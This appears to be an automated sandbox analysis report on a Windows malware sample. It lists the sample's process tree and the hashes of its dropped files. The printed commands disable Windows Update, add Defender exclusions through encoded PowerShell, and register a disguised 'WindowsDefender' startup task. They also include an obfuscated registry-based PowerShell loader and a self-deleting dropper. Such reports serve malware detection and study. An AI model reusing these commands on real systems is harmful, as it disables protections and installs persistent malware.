C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"4⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4004 -s 7842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3748 -s 8762⤵
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe"C:\Users\Admin\AppData\Local\Temp\c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER412F.tmp.csvFilesize
31KB
MD5df4612ab21f2a08fd8a6bb3bf57575f5
SHA1513e5561c32b24669c6ce20bd8c452aac13c167b
SHA256fe6602d68700d6ec5a9fd750b769be7d6d2cf87ce8f030de12078cb53ffc55ae
SHA5129e9ae17aa1e197b393fe0216549a440a81eca2bb586dfdaf9089655688911d0fc730f463d857d94f6a2ffcc1e3cbd83c1379a7e037c8b5fa7347c7efe9c47e36
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER418E.tmp.csvFilesize
31KB
MD5c634773a612f6a8d0f82d3c6a5c05dc3
SHA1453d1765c3191f4fa8dc08c7077795c275537ec2
SHA256bdd80559814404f12d9abd102a5f9df8ef6cbecb223f966ec2f02defb7e2920c
SHA5129ebff407eb106d2c45ade38350eceb2b6d38a5d18408bc542af75096c7b1b664155909b7b5fd603a96ee0cf005424031f75c2f828d58383cf4285130cfea4715
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER418F.tmp.txtFilesize
12KB
MD513299b79258f3834bdba279d7b0ca031
SHA194306150fb19f801d57f9c3ad094110a2dc3f5c5
SHA25614470a462b7e99d1a3f3ceefe85efd0c24a1dfb73805e74d8b5ac96f0eeaee0a
SHA512472956704d729516c9b0e2231620f27f0c8df72f64fa0abbecdeddb9e560fbd6df1ffe484ae6c43f84c46cb0c0a95899c2413edee84909f9f554cf7f71a2ba06
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER41EE.tmp.txtFilesize
12KB
MD51a92c0cc6eaac2448c36d24450cd223e
SHA18b335242c6da60c778384659b89e46b25f5cd1dc
SHA2563723a1c9c3b3ba9cef14f37d2d236afbd0d10b5e0203f8f3aa40d6714119683d
SHA512cfa1a6846f2a30203c603d75c32880f81d2023df683748eaefe6bbf46bc1daac76a814cc2865b1aaa3b859f2914781329bea7d322a0129835fb8a832de423216
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e26705c4d6a639f9d02279b22bf459b8
SHA1a4eabe64a57b960f9ea0cd849a6330ca00d993cc
SHA2569acaf315f10548ef8ad38b9e956badc5af08a91a798ff9504bfeac76a5519bdd
SHA512dc083216c80aff5f0262c890a106c09c96545e19a99b5c6fea55ffcb828a774fa8ada4424f8d856cc10055d07d909aaea50112678603f880a446a7bbc26356dc
-
C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
